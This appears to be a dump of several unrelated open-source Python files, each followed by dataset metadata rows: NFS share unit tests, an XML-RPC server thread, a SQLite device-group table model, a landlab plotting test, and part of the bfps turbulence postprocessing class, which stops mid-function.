def test_get_share_by_path_success(self):
path = '/EEE'
shares = VNXNfsShare.get(t_nas(), path=path)
assert_that(len(shares), equal_to(1))
share = next(s for s in shares if s.path == path)
self.verify_share_eee(share)
@patch_nas
def test_get_share_by_mover_id(self):
mover = self.get_mover_1()
shares = VNXNfsShare.get(t_nas(), mover=mover)
assert_that(len(shares), equal_to(24))
share = next(s for s in shares if s.path == '/EEE')
self.verify_share_eee(share)
@staticmethod
def verify_share_eee(share):
assert_that(share.path, equal_to('/EEE'))
assert_that(share.read_only, equal_to(False))
assert_that(share.fs_id, equal_to(213))
assert_that(share.mover_id, equal_to(1))
assert_that(len(share.root_hosts), equal_to(41))
assert_that(share.access_hosts, has_item('10.110.43.94'))
assert_that(len(share.access_hosts), equal_to(41))
assert_that(share.access_hosts, has_item('10.110.43.94'))
assert_that(len(share.rw_hosts), equal_to(41))
assert_that(share.rw_hosts, has_item('10.110.43.94'))
assert_that(len(share.ro_hosts), equal_to(41))
assert_that(share.ro_hosts, has_item('10.110.43.94'))
@patch_nas
def test_modify_not_exists(self):
def f():
host_config = NfsHostConfig(
root_hosts=['1.1.1.1', '2.2.2.2'],
ro_hosts=['3.3.3.3'],
rw_hosts=['4.4.4.4', '5.5.5.5'],
access_hosts=['6.6.6.6'])
mover = self.get_mover_1()
share = VNXNfsShare(cli=t_nas(), mover=mover, path='/not_found')
share.modify(ro=False, host_config=host_config)
assert_that(f, raises(VNXBackendError, 'does not exist'))
@patch_nas
def test_modify_success(self):
host_config = NfsHostConfig(access_hosts=['7.7.7.7'])
mover = self.get_mover_1()
share = VNXNfsShare(cli=t_nas(), mover=mover, path='/EEE')
resp = share.modify(ro=True, host_config=host_config)
assert_that(resp.is_ok(), equal_to(True))
@patch_nas
def test_create_no_host(self):
def f():
mover = self.get_mover_1()
VNXNfsShare.create(cli=t_nas(), mover=mover, path='/invalid')
assert_that(f, raises(VNXBackendError, 'is invalid'))
@patch_nas
def test_create_success(self):
mover = self.get_mover_1()
share = VNXNfsShare.create(cli=t_nas(), mover=mover, path='/EEE')
assert_that(share.path, equal_to('/EEE'))
assert_that(share.mover_id, equal_to(1))
assert_that(share.existed, equal_to(True))
assert_that(share.fs_id, equal_to(243))
@patch_nas
def test_create_with_host_config(self):
mover = self.get_mover_1()
host_config = NfsHostConfig(
root_hosts=['1.1.1.1', '2.2.2.2'],
ro_hosts=['3.3.3.3'],
rw_hosts=['4.4.4.4', '5.5.5.5'],
access_hosts=['6.6.6.6'])
share = VNXNfsShare.create(cli=t_nas(), mover=mover, path='/FFF',
host_config=host_config)
assert_that(share.fs_id, equal_to(247))
assert_that(share.path, equal_to('/FFF'))
assert_that(share.existed, equal_to(True))
assert_that(share.access_hosts, has_item('6.6.6.6'))
@patch_nas
def test_delete_success(self):
mover = self.get_mover_1()
share = VNXNfsShare(cli=t_nas(), mover=mover, path='/EEE')
resp = share.delete()
assert_that(resp.is_ok(), equal_to(True))
@patch_nas
def test_delete_not_found(self):
def f():
mover = self.get_mover_1()
share = VNXNfsShare(cli=t_nas(), mover=mover, path='/not_found')
share.delete()
assert_that(f, raises(VNXBackendError, 'Invalid argument'))
@staticmethod
def get_mover_1():
return VNXMover(mover_id=1, cli=t_nas())
@patch_nas
def test_mover_property(self):
mover = self.get_mover_1()
share = VNXNfsShare.get(cli=t_nas(), mover=mover, path='/EEE')
mover = share.mover
assert_that(mover.existed, equal_to(True))
assert_that(mover.role, equal_to('primary'))
@patch_nas
def test_fs_property(self):
mover = self.get_mover_1()
share = VNXNfsShare.get(cli=t_nas(), mover=mover, path='/EEE')
fs = share.fs
assert_that(fs.existed, equal_to(True))
assert_that(fs.fs_id, equal_to(243))
@patch_nas
def test_allow_ro_hosts(self):
mover = self.get_mover_1()
share = VNXNfsShare(cli=t_nas(), mover=mover, path='/minjie_fs1')
resp = share.allow_ro_access('1.1.1.1', '2.2.2.2')
assert_that(resp.is_ok(), equal_to(True))
@patch_nas
def test_deny_hosts(self):
mover = self.get_mover_1()
share = VNXNfsShare(cli=t_nas(), mover=mover, path='/minjie_fs2')
resp = share.deny_access('1.1.1.1', '2.2.2.2')
assert_that(resp.is_ok(), equal_to(True))
| apache-2.0 | 4,224,096,191,783,860,000 | 35.944751 | 78 | 0.600568 | false | 3.042311 | true | false | false |
TheGentlemanOctopus/thegentlemanoctopus | octopus_code/core/octopus/rpcServer.py | 1 | 2481 | #!/usr/bin/env python
import threading
import Queue
import time
from SimpleXMLRPCServer import SimpleXMLRPCServer
from SimpleXMLRPCServer import SimpleXMLRPCRequestHandler
import xmlrpclib
rpc_path = '/RPC2'
# The RPC server listens at host:port/rpc_path
class RequestHandler(SimpleXMLRPCRequestHandler):
rpc_paths = (rpc_path,)
class RpcServer(threading.Thread):
def __init__(self, dataQueue=1, host='127.0.0.1', port=8000):
self.host = host
self.port = port
#Initialise the thread
threading.Thread.__init__(self)
# Python warns about file locking and such with daemon threads
# but we are not using any resources like that here
# https://docs.python.org/2/library/threading.html#thread-objects
self.daemon = True
self.server = SimpleXMLRPCServer((host, port),
requestHandler=RequestHandler,
logRequests=False
)
self.server.register_function(self.put)
# TODO: 1000 should be more than enough, but we should make sure,
# Annoying! LIFO queue's don't have a clear
self.queue = Queue.Queue(1000)
def run(self):
self.server.serve_forever()
# Request data is expected to be a dictionary since
# only simple data types can be serialized over xmlrpc (python objects cannot)
# See: http://www.tldp.org/HOWTO/XML-RPC-HOWTO/xmlrpc-howto-intro.html#xmlrpc-howto-types
def put(self, requestData):
with self.queue.mutex:
self.queue.queue.clear()
self.queue.put(requestData)
if self.queue.full():
print "WARNING! Max data queue limit reached: " + str(self.queue.qsize())
#Echo for now
return requestData
def url(self):
return "http://%s:%i%s" % (self.host, self.port, rpc_path)
#LIFO get
def get(self):
with self.queue.mutex:
item = self.queue.queue[-1]
self.queue.queue.clear()
return item
# Example
if __name__ == '__main__':
# Run the Rpc server on a new thread
rpc_server = RpcServer()
print "Running XML-RPC server at " + rpc_server.url()
rpc_server.start()
# Make a client
s = xmlrpclib.ServerProxy(rpc_server.url())
# Echo
count=0
while True:
s.put({"x": count})
count += 1
if not rpc_server.queue.empty():
print "Item received: " + str(rpc_server.queue.get())
time.sleep(3)
| gpl-3.0 | 584,448,511,133,125,900 | 27.517241 | 93 | 0.626763 | false | 3.846512 | false | false | false |
dhocker/athomepowerlineserver | database/action_group_devices.py | 1 | 3254 | # -*- coding: utf-8 -*-
#
# AtHomePowerlineServer
# Copyright © 2020 Dave Hocker
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, version 3 of the License.
#
# See the LICENSE file for more details.
#
#
# Programs table model
#
from database.AtHomePowerlineServerDb import AtHomePowerlineServerDb
from .base_table import BaseTable
class ActionGroupDevices(BaseTable):
def __init__(self):
pass
def get_group_devices(self, group_id):
self.clear_last_error()
conn = None
try:
conn = AtHomePowerlineServerDb.GetConnection()
c = AtHomePowerlineServerDb.GetCursor(conn)
# The results are sorted based on the most probable use
rset = c.execute(
"SELECT * from ManagedDevices "
"JOIN ActionGroupDevices ON ActionGroupDevices.group_id=:group_id "
"WHERE ManagedDevices.id=ActionGroupDevices.device_id", {"group_id": group_id}
)
result = ActionGroupDevices.rows_to_dict_list(rset)
except Exception as ex:
self.set_last_error(ActionGroupDevices.SERVER_ERROR, str(ex))
result = None
finally:
# Make sure connection is closed
if conn is not None:
conn.close()
return result
def insert_device(self, group_id, device_id):
"""
Insert a group device record
:param group_id: The containing group ID
:param device_id: The devid ID being added to the group
:return:
"""
self.clear_last_error()
conn = None
try:
conn = AtHomePowerlineServerDb.GetConnection()
c = AtHomePowerlineServerDb.GetCursor(conn)
c.execute(
"INSERT INTO ActionGroupDevices (group_id,device_id) values (?,?)",
(group_id, device_id)
)
conn.commit()
# Get id of inserted record
id = c.lastrowid
except Exception as ex:
self.set_last_error(ActionGroupDevices.SERVER_ERROR, str(ex))
id = None
finally:
# Make sure connection is closed
if conn is not None:
conn.close()
return id
def delete_device(self, group_id, device_id):
self.clear_last_error()
conn = None
try:
conn = AtHomePowerlineServerDb.GetConnection()
c = AtHomePowerlineServerDb.GetCursor(conn)
# The results are sorted based on the most probable use
c.execute(
"DELETE FROM ActionGroupDevices WHERE group_id=:group_id AND device_id=:device_id",
{"group_id": group_id, "device_id": device_id}
)
conn.commit()
change_count = conn.total_changes
except Exception as ex:
self.set_last_error(ActionGroupDevices.SERVER_ERROR, str(ex))
change_count = 0
finally:
# Make sure connection is closed
if conn is not None:
conn.close()
return change_count
| gpl-3.0 | 4,163,177,689,781,883,000 | 30.892157 | 99 | 0.584384 | false | 4.224675 | false | false | false |
Carralex/landlab | landlab/plot/tests/test_event_handler.py | 1 | 1185 | #! /usr/bin/env python
"""
Created on Thu Jun 29 11:02:28 2017
@author: njlyons
"""
from landlab import imshow_grid, RasterModelGrid
from landlab.plot.event_handler import query_grid_on_button_press
from matplotlib.pyplot import gcf
from matplotlib.backend_bases import Event
from numpy.testing import assert_equal
def test_query_grid_on_button_press():
rmg = RasterModelGrid((5, 5))
imshow_grid(rmg, rmg.nodes, cmap='RdYlBu')
# Programmatically create an event near the grid center.
event = Event('simulated_event', gcf().canvas)
event.xdata = int(rmg.number_of_node_columns * 0.5)
event.ydata = int(rmg.number_of_node_rows * 0.5)
results = query_grid_on_button_press(event, rmg)
x_coord = results['grid location']['x_coord']
y_coord = results['grid location']['x_coord']
msg = 'Items: Simulated matplotlib event and query results.'
assert_equal(x_coord, event.xdata, msg)
assert_equal(y_coord, event.ydata, msg)
msg = 'Items: Node ID and grid coordinates of simulated matplotlib event.'
node = rmg.grid_coords_to_node_id(event.xdata, event.ydata)
assert_equal(results['node']['ID'], node, msg)
| mit | 5,975,126,253,596,191,000 | 32.857143 | 78 | 0.692827 | false | 3.211382 | false | false | false |
chichilalescu/bfps | bfps/PP.py | 1 | 37051 | #######################################################################
# #
# Copyright 2015 Max Planck Institute #
# for Dynamics and Self-Organization #
# #
# This file is part of bfps. #
# #
# bfps is free software: you can redistribute it and/or modify #
# it under the terms of the GNU General Public License as published #
# by the Free Software Foundation, either version 3 of the License, #
# or (at your option) any later version. #
# #
# bfps is distributed in the hope that it will be useful, #
# but WITHOUT ANY WARRANTY; without even the implied warranty of #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
# GNU General Public License for more details. #
# #
# You should have received a copy of the GNU General Public License #
# along with bfps. If not, see <http://www.gnu.org/licenses/> #
# #
# Contact: [email protected] #
# #
#######################################################################
import os
import sys
import shutil
import subprocess
import argparse
import h5py
import math
import numpy as np
import warnings
import bfps
from ._code import _code
from bfps import tools
class PP(_code):
"""This class is meant to stitch together the C++ code into a final source file,
compile it, and handle all job launching.
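
    A minimal usage sketch (hypothetical; assumes a finished bfps run called
    ``test`` exists in the current folder, whose data we want to postprocess)::

        cc = PP(work_dir = './', simname = 'test')
        cc.launch(
                ['get_rfields',
                 '--simname', 'test',
                 '--iter0', '0',
                 '--iter1', '128'])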
"""
def __init__(
self,
work_dir = './',
simname = 'test'):
_code.__init__(
self,
work_dir = work_dir,
simname = simname)
self.host_info = {'type' : 'cluster',
'environment' : None,
'deltanprocs' : 1,
'queue' : '',
'mail_address': '',
'mail_events' : None}
self.generate_default_parameters()
return None
def set_precision(
self,
fluid_dtype):
if fluid_dtype in [np.float32, np.float64]:
self.fluid_dtype = fluid_dtype
elif fluid_dtype in ['single', 'double']:
if fluid_dtype == 'single':
self.fluid_dtype = np.dtype(np.float32)
elif fluid_dtype == 'double':
                self.fluid_dtype = np.dtype(np.float64)
        else:
            raise ValueError(
                    'invalid fluid_dtype: {0}'.format(fluid_dtype))
self.rtype = self.fluid_dtype
if self.rtype == np.float32:
self.ctype = np.dtype(np.complex64)
self.C_field_dtype = 'float'
self.fluid_precision = 'single'
elif self.rtype == np.float64:
self.ctype = np.dtype(np.complex128)
self.C_field_dtype = 'double'
self.fluid_precision = 'double'
return None
def write_src(self):
self.version_message = (
'/***********************************************************************\n' +
            '* this code was automatically generated by bfps\n' +
'* version {0}\n'.format(bfps.__version__) +
'***********************************************************************/\n\n\n')
self.include_list = [
'"base.hpp"',
'"scope_timer.hpp"',
'"fftw_interface.hpp"',
'"full_code/main_code.hpp"',
'<cmath>',
'<iostream>',
'<hdf5.h>',
'<string>',
'<cstring>',
'<fftw3-mpi.h>',
'<omp.h>',
'<cfenv>',
'<cstdlib>',
'"full_code/{0}.hpp"\n'.format(self.dns_type)]
self.main = """
int main(int argc, char *argv[])
{{
bool fpe = (
(getenv("BFPS_FPE_OFF") == nullptr) ||
(getenv("BFPS_FPE_OFF") != std::string("TRUE")));
return main_code< {0} >(argc, argv, fpe);
}}
""".format(self.dns_type + '<{0}>'.format(self.C_field_dtype))
self.includes = '\n'.join(
['#include ' + hh
for hh in self.include_list])
with open(self.name + '.cpp', 'w') as outfile:
outfile.write(self.version_message + '\n\n')
outfile.write(self.includes + '\n\n')
outfile.write(self.main + '\n')
return None
def generate_default_parameters(self):
# these parameters are relevant for all PP classes
self.parameters['dealias_type'] = int(1)
self.parameters['dkx'] = float(1.0)
self.parameters['dky'] = float(1.0)
self.parameters['dkz'] = float(1.0)
self.parameters['nu'] = float(0.1)
self.parameters['fmode'] = int(1)
self.parameters['famplitude'] = float(0.5)
self.parameters['fk0'] = float(2.0)
self.parameters['fk1'] = float(4.0)
self.parameters['forcing_type'] = 'linear'
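        # parameters specific to the postprocessing job; prepare_launch
        # merges these into self.parameters before parsing arguments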
self.pp_parameters = {}
self.pp_parameters['iteration_list'] = np.zeros(1).astype(np.int)
return None
def extra_postprocessing_parameters(
self,
dns_type = 'joint_acc_vel_stats'):
pars = {}
if dns_type == 'joint_acc_vel_stats':
pars['max_acceleration_estimate'] = float(10)
pars['max_velocity_estimate'] = float(1)
pars['histogram_bins'] = int(129)
return pars
def get_data_file_name(self):
return os.path.join(self.work_dir, self.simname + '.h5')
def get_data_file(self):
return h5py.File(self.get_data_file_name(), 'r')
def get_particle_file_name(self):
return os.path.join(self.work_dir, self.simname + '_particles.h5')
def get_particle_file(self):
return h5py.File(self.get_particle_file_name(), 'r')
def get_postprocess_file_name(self):
return os.path.join(self.work_dir, self.simname + '_postprocess.h5')
def get_postprocess_file(self):
return h5py.File(self.get_postprocess_file_name(), 'r')
def compute_statistics(self, iter0 = 0, iter1 = None):
"""Run basic postprocessing on raw data.
        The energy spectrum :math:`E(t, k)` and the enstrophy spectrum
        :math:`\\frac{1}{2}\\omega^2(t, k)` are computed from the

        .. math::

            \\sum_{k \\leq \\|\\mathbf{k}\\| \\leq k+dk}\\hat{u_i} \\hat{u_j}^*, \\hskip .5cm
            \\sum_{k \\leq \\|\\mathbf{k}\\| \\leq k+dk}\\hat{\\omega_i} \\hat{\\omega_j}^*
tensors, and the enstrophy spectrum is also used to
compute the dissipation :math:`\\varepsilon(t)`.
These basic quantities are stored in a newly created HDF5 file,
``simname_postprocess.h5``.
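
        A minimal usage sketch (assumes the data file of simulation ``test``
        already holds the required statistics datasets)::

            cc = PP(work_dir = './', simname = 'test')
            cc.compute_statistics()
            print(cc.statistics['energy'])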
"""
if len(list(self.statistics.keys())) > 0:
return None
self.read_parameters()
with self.get_data_file() as data_file:
if 'moments' not in data_file['statistics'].keys():
return None
iter0 = min((data_file['statistics/moments/velocity'].shape[0] *
self.parameters['niter_stat']-1),
iter0)
if type(iter1) == type(None):
iter1 = data_file['iteration'].value
else:
iter1 = min(data_file['iteration'].value, iter1)
ii0 = iter0 // self.parameters['niter_stat']
ii1 = iter1 // self.parameters['niter_stat']
self.statistics['kshell'] = data_file['kspace/kshell'].value
self.statistics['kM'] = data_file['kspace/kM'].value
self.statistics['dk'] = data_file['kspace/dk'].value
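        # basic quantities are cached in simname_postprocess.h5; they are
        # only recomputed when the requested iteration range changes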
computation_needed = True
pp_file = h5py.File(self.get_postprocess_file_name(), 'a')
if 'ii0' in pp_file.keys():
computation_needed = not (ii0 == pp_file['ii0'].value and
ii1 == pp_file['ii1'].value)
if computation_needed:
                for k in list(pp_file.keys()):
del pp_file[k]
if computation_needed:
pp_file['iter0'] = iter0
pp_file['iter1'] = iter1
pp_file['ii0'] = ii0
pp_file['ii1'] = ii1
pp_file['t'] = (self.parameters['dt']*
self.parameters['niter_stat']*
(np.arange(ii0, ii1+1).astype(np.float)))
pp_file['energy(t, k)'] = (
data_file['statistics/spectra/velocity_velocity'][ii0:ii1+1, :, 0, 0] +
data_file['statistics/spectra/velocity_velocity'][ii0:ii1+1, :, 1, 1] +
data_file['statistics/spectra/velocity_velocity'][ii0:ii1+1, :, 2, 2])/2
pp_file['enstrophy(t, k)'] = (
data_file['statistics/spectra/vorticity_vorticity'][ii0:ii1+1, :, 0, 0] +
data_file['statistics/spectra/vorticity_vorticity'][ii0:ii1+1, :, 1, 1] +
data_file['statistics/spectra/vorticity_vorticity'][ii0:ii1+1, :, 2, 2])/2
            pp_file['vel_max(t)'] = data_file['statistics/moments/velocity'][ii0:ii1+1, 9, 3]
pp_file['renergy(t)'] = data_file['statistics/moments/velocity'][ii0:ii1+1, 2, 3]/2
for k in ['t',
'energy(t, k)',
'enstrophy(t, k)',
'vel_max(t)',
'renergy(t)']:
if k in pp_file.keys():
self.statistics[k] = pp_file[k].value
self.compute_time_averages()
return None
def compute_time_averages(self):
"""Compute easy stats.
Further computation of statistics based on the contents of
``simname_postprocess.h5``.
Standard quantities are as follows
(consistent with [Ishihara]_):
        .. math::

            U_{\\textrm{int}}(t) = \\sqrt{\\frac{2E(t)}{3}}, \\hskip .5cm
            L_{\\textrm{int}}(t) = \\frac{\\pi}{2U_{\\textrm{int}}^2(t)} \\int \\frac{dk}{k} E(t, k), \\hskip .5cm
            T_{\\textrm{int}}(t) = \\frac{L_{\\textrm{int}}(t)}{U_{\\textrm{int}}(t)}

            \\eta_K = \\left(\\frac{\\nu^3}{\\varepsilon}\\right)^{1/4}, \\hskip .5cm
            \\tau_K = \\left(\\frac{\\nu}{\\varepsilon}\\right)^{1/2}, \\hskip .5cm
            \\lambda = \\sqrt{\\frac{15 \\nu U_{\\textrm{int}}^2}{\\varepsilon}}

            Re = \\frac{U_{\\textrm{int}} L_{\\textrm{int}}}{\\nu}, \\hskip .5cm
            R_{\\lambda} = \\frac{U_{\\textrm{int}} \\lambda}{\\nu}
.. [Ishihara] T. Ishihara et al,
*Small-scale statistics in high-resolution direct numerical
simulation of turbulence: Reynolds number dependence of
one-point velocity gradient statistics*.
J. Fluid Mech.,
**592**, 335-366, 2007
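
        All of the above end up in the ``statistics`` dictionary, e.g.
        (sketch, with ``cc`` a PP instance whose statistics were computed)::

            cc.compute_statistics()
            print(cc.statistics['Rlambda'], cc.statistics['kMeta'])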
"""
for key in ['energy', 'enstrophy']:
self.statistics[key + '(t)'] = (self.statistics['dk'] *
np.sum(self.statistics[key + '(t, k)'], axis = 1))
self.statistics['Uint(t)'] = np.sqrt(2*self.statistics['energy(t)'] / 3)
self.statistics['Lint(t)'] = ((self.statistics['dk']*np.pi /
(2*self.statistics['Uint(t)']**2)) *
np.nansum(self.statistics['energy(t, k)'] /
self.statistics['kshell'][None, :], axis = 1))
for key in ['energy',
'enstrophy',
'vel_max',
'Uint',
'Lint']:
if key + '(t)' in self.statistics.keys():
self.statistics[key] = np.average(self.statistics[key + '(t)'], axis = 0)
for suffix in ['', '(t)']:
self.statistics['diss' + suffix] = (self.parameters['nu'] *
self.statistics['enstrophy' + suffix]*2)
self.statistics['etaK' + suffix] = (self.parameters['nu']**3 /
self.statistics['diss' + suffix])**.25
self.statistics['tauK' + suffix] = (self.parameters['nu'] /
self.statistics['diss' + suffix])**.5
self.statistics['Re' + suffix] = (self.statistics['Uint' + suffix] *
self.statistics['Lint' + suffix] /
self.parameters['nu'])
self.statistics['lambda' + suffix] = (15 * self.parameters['nu'] *
self.statistics['Uint' + suffix]**2 /
self.statistics['diss' + suffix])**.5
self.statistics['Rlambda' + suffix] = (self.statistics['Uint' + suffix] *
self.statistics['lambda' + suffix] /
self.parameters['nu'])
self.statistics['kMeta' + suffix] = (self.statistics['kM'] *
self.statistics['etaK' + suffix])
if self.parameters['dealias_type'] == 1:
self.statistics['kMeta' + suffix] *= 0.8
self.statistics['Tint'] = self.statistics['Lint'] / self.statistics['Uint']
self.statistics['Taylor_microscale'] = self.statistics['lambda']
return None
def set_plt_style(
self,
style = {'dashes' : (None, None)}):
self.style.update(style)
return None
def convert_complex_from_binary(
self,
field_name = 'vorticity',
iteration = 0,
file_name = None):
"""read the Fourier representation of a vector field.
Read the binary file containing iteration ``iteration`` of the
field ``field_name``, and write it in a ``.h5`` file.
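
        Sketch of use (with ``cc`` a configured PP instance; the binary file
        for the requested iteration must already exist in ``work_dir``)::

            cc.convert_complex_from_binary(
                    field_name = 'vorticity',
                    iteration = 0)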
"""
data = np.memmap(
os.path.join(self.work_dir,
self.simname + '_{0}_i{1:0>5x}'.format('c' + field_name, iteration)),
dtype = self.ctype,
mode = 'r',
shape = (self.parameters['ny'],
self.parameters['nz'],
self.parameters['nx']//2+1,
3))
if type(file_name) == type(None):
file_name = self.simname + '_{0}_i{1:0>5x}.h5'.format('c' + field_name, iteration)
file_name = os.path.join(self.work_dir, file_name)
f = h5py.File(file_name, 'a')
f[field_name + '/complex/{0}'.format(iteration)] = data
f.close()
return None
def job_parser_arguments(
self,
parser):
parser.add_argument(
'--ncpu',
type = int,
dest = 'ncpu',
default = -1)
parser.add_argument(
'--np', '--nprocesses',
metavar = 'NPROCESSES',
help = 'number of mpi processes to use',
type = int,
dest = 'nb_processes',
default = 4)
parser.add_argument(
'--ntpp', '--nthreads-per-process',
type = int,
dest = 'nb_threads_per_process',
metavar = 'NTHREADS_PER_PROCESS',
help = 'number of threads to use per MPI process',
default = 1)
parser.add_argument(
'--no-submit',
action = 'store_true',
dest = 'no_submit')
parser.add_argument(
'--environment',
type = str,
dest = 'environment',
default = None)
parser.add_argument(
'--minutes',
type = int,
dest = 'minutes',
default = 5,
help = 'If environment supports it, this is the requested wall-clock-limit.')
parser.add_argument(
'--njobs',
type = int, dest = 'njobs',
default = 1)
return None
def simulation_parser_arguments(
self,
parser):
parser.add_argument(
'--simname',
type = str, dest = 'simname',
default = 'test')
parser.add_argument(
'--wd',
type = str, dest = 'work_dir',
default = './')
parser.add_argument(
'--precision',
choices = ['single', 'double'],
type = str,
default = 'single')
parser.add_argument(
'--iter0',
type = int,
dest = 'iter0',
default = 0)
parser.add_argument(
'--iter1',
type = int,
dest = 'iter1',
default = 0)
return None
def particle_parser_arguments(
self,
parser):
parser.add_argument(
'--particle-rand-seed',
type = int,
dest = 'particle_rand_seed',
default = None)
parser.add_argument(
'--pclouds',
type = int,
dest = 'pclouds',
default = 1,
help = ('number of particle clouds. Particle "clouds" '
'consist of particles distributed according to '
'pcloud-type.'))
parser.add_argument(
'--pcloud-type',
choices = ['random-cube',
'regular-cube'],
dest = 'pcloud_type',
default = 'random-cube')
parser.add_argument(
'--particle-cloud-size',
type = float,
dest = 'particle_cloud_size',
default = 2*np.pi)
return None
def add_parser_arguments(
self,
parser):
subparsers = parser.add_subparsers(
dest = 'DNS_class',
help = 'type of simulation to run')
subparsers.required = True
parser_native_binary_to_hdf5 = subparsers.add_parser(
'native_binary_to_hdf5',
help = 'convert native binary to hdf5')
self.simulation_parser_arguments(parser_native_binary_to_hdf5)
self.job_parser_arguments(parser_native_binary_to_hdf5)
self.parameters_to_parser_arguments(parser_native_binary_to_hdf5)
parser_get_rfields = subparsers.add_parser(
'get_rfields',
help = 'get real space velocity field')
self.simulation_parser_arguments(parser_get_rfields)
self.job_parser_arguments(parser_get_rfields)
self.parameters_to_parser_arguments(parser_get_rfields)
parser_joint_acc_vel_stats = subparsers.add_parser(
'joint_acc_vel_stats',
help = 'get joint acceleration and velocity statistics')
self.simulation_parser_arguments(parser_joint_acc_vel_stats)
self.job_parser_arguments(parser_joint_acc_vel_stats)
self.parameters_to_parser_arguments(parser_joint_acc_vel_stats)
self.parameters_to_parser_arguments(
parser_joint_acc_vel_stats,
parameters = self.extra_postprocessing_parameters('joint_acc_vel_stats'))
return None
def prepare_launch(
self,
args = []):
"""Set up reasonable parameters.
With the default Lundgren forcing applied in the band [2, 4],
we can estimate the dissipation, therefore we can estimate
:math:`k_M \\eta_K` and constrain the viscosity.
In brief, the command line parameter :math:`k_M \\eta_K` is
used in the following formula for :math:`\\nu` (:math:`N` is the
number of real space grid points per coordinate):
        .. math::

            \\nu = \\left(\\frac{2 k_M \\eta_K}{N} \\right)^{4/3}
With this choice, the average dissipation :math:`\\varepsilon`
will be close to 0.4, and the integral scale velocity will be
close to 0.77, yielding the approximate value for the Taylor
microscale and corresponding Reynolds number:
        .. math::

            \\lambda \\approx 4.75\\left(\\frac{2 k_M \\eta_K}{N} \\right)^{4/6}, \\hskip .5in
            R_\\lambda \\approx 3.7 \\left(\\frac{N}{2 k_M \\eta_K} \\right)^{4/6}
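
        As a worked example (plain arithmetic, not taken from the code):
        :math:`N = 256` with :math:`k_M \\eta_K = 2` gives
        :math:`\\nu = (4/256)^{4/3} = 2^{-8} \\approx 3.9 \\times 10^{-3}`.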
"""
opt = _code.prepare_launch(self, args = args)
self.set_precision(opt.precision)
self.dns_type = opt.DNS_class
self.name = self.dns_type + '-' + self.fluid_precision + '-v' + bfps.__version__
# merge parameters if needed
for k in self.pp_parameters.keys():
self.parameters[k] = self.pp_parameters[k]
self.pars_from_namespace(opt)
        with self.get_data_file() as data_file:
            niter_out = data_file['parameters/niter_out'].value
        assert(opt.iter0 % niter_out == 0)
self.pp_parameters['iteration_list'] = np.arange(
opt.iter0, opt.iter1+niter_out, niter_out, dtype = np.int)
return opt
def launch(
self,
args = [],
**kwargs):
opt = self.prepare_launch(args = args)
self.launch_jobs(opt = opt, **kwargs)
return None
def get_checkpoint_0_fname(self):
return os.path.join(
self.work_dir,
self.simname + '_checkpoint_0.h5')
def generate_tracer_state(
self,
rseed = None,
species = 0):
with h5py.File(self.get_checkpoint_0_fname(), 'a') as data_file:
dset = data_file[
'tracers{0}/state/0'.format(species)]
            if rseed is not None:
np.random.seed(rseed)
nn = self.parameters['nparticles']
cc = int(0)
batch_size = int(1e6)
while nn > 0:
if nn > batch_size:
dset[cc*batch_size:(cc+1)*batch_size] = np.random.random(
(batch_size, 3))*2*np.pi
nn -= batch_size
else:
dset[cc*batch_size:cc*batch_size+nn] = np.random.random(
(nn, 3))*2*np.pi
nn = 0
cc += 1
return None
def generate_vector_field(
self,
rseed = 7547,
spectra_slope = 1.,
amplitude = 1.,
iteration = 0,
field_name = 'vorticity',
write_to_file = False,
# to switch to constant field, use generate_data_3D_uniform
# for scalar_generator
scalar_generator = tools.generate_data_3D):
"""generate vector field.
The generated field is not divergence free, but it has the proper
shape.
:param rseed: seed for random number generator
:param spectra_slope: spectrum of field will look like k^(-p)
:param amplitude: all amplitudes are multiplied with this value
:param iteration: the field is written at this iteration
:param field_name: the name of the field being generated
:param write_to_file: should we write the field to file?
:param scalar_generator: which function to use for generating the
individual components.
Possible values: bfps.tools.generate_data_3D,
bfps.tools.generate_data_3D_uniform
:type rseed: int
:type spectra_slope: float
:type amplitude: float
:type iteration: int
:type field_name: str
:type write_to_file: bool
:type scalar_generator: function
:returns: ``Kdata``, a complex valued 4D ``numpy.array`` that uses the
transposed FFTW layout.
Kdata[ky, kz, kx, i] is the amplitude of mode (kx, ky, kz) for
the i-th component of the field.
(i.e. x is the fastest index and z the slowest index in the
real-space representation).
"""
np.random.seed(rseed)
Kdata00 = scalar_generator(
self.parameters['nz']//2,
self.parameters['ny']//2,
self.parameters['nx']//2,
p = spectra_slope,
amplitude = amplitude).astype(self.ctype)
Kdata01 = scalar_generator(
self.parameters['nz']//2,
self.parameters['ny']//2,
self.parameters['nx']//2,
p = spectra_slope,
amplitude = amplitude).astype(self.ctype)
Kdata02 = scalar_generator(
self.parameters['nz']//2,
self.parameters['ny']//2,
self.parameters['nx']//2,
p = spectra_slope,
amplitude = amplitude).astype(self.ctype)
Kdata0 = np.zeros(
Kdata00.shape + (3,),
Kdata00.dtype)
Kdata0[..., 0] = Kdata00
Kdata0[..., 1] = Kdata01
Kdata0[..., 2] = Kdata02
Kdata1 = tools.padd_with_zeros(
Kdata0,
self.parameters['nz'],
self.parameters['ny'],
self.parameters['nx'])
if write_to_file:
Kdata1.tofile(
os.path.join(self.work_dir,
self.simname + "_c{0}_i{1:0>5x}".format(field_name, iteration)))
return Kdata1
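    # Hedged usage sketch for generate_vector_field; the object name `c` and
    # the parameter values are illustrative assumptions.
    #
    #   Kdata = c.generate_vector_field(
    #           rseed = 7547,
    #           spectra_slope = 5./3,
    #           write_to_file = True)
    #   # Kdata uses the transposed FFTW layout described in the docstring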
def copy_complex_field(
self,
src_file_name,
src_dset_name,
dst_file,
dst_dset_name,
make_link = True):
        # A min_shape is computed below, but for now this method is only trusted
        # for the case of increasing/decreasing resolution by the same factor in
        # all directions. Something more generic could be written in principle,
        # but it is unclear how complicated that would be.
dst_shape = (self.parameters['nz'],
self.parameters['ny'],
(self.parameters['nx']+2) // 2,
3)
src_file = h5py.File(src_file_name, 'r')
if (src_file[src_dset_name].shape == dst_shape):
if make_link and (src_file[src_dset_name].dtype == self.ctype):
dst_file[dst_dset_name] = h5py.ExternalLink(
src_file_name,
src_dset_name)
else:
dst_file.create_dataset(
dst_dset_name,
shape = dst_shape,
dtype = self.ctype,
fillvalue = 0.0)
for kz in range(src_file[src_dset_name].shape[0]):
dst_file[dst_dset_name][kz] = src_file[src_dset_name][kz]
else:
            print('source and destination shapes differ; copying overlapping modes')
min_shape = (min(dst_shape[0], src_file[src_dset_name].shape[0]),
min(dst_shape[1], src_file[src_dset_name].shape[1]),
min(dst_shape[2], src_file[src_dset_name].shape[2]),
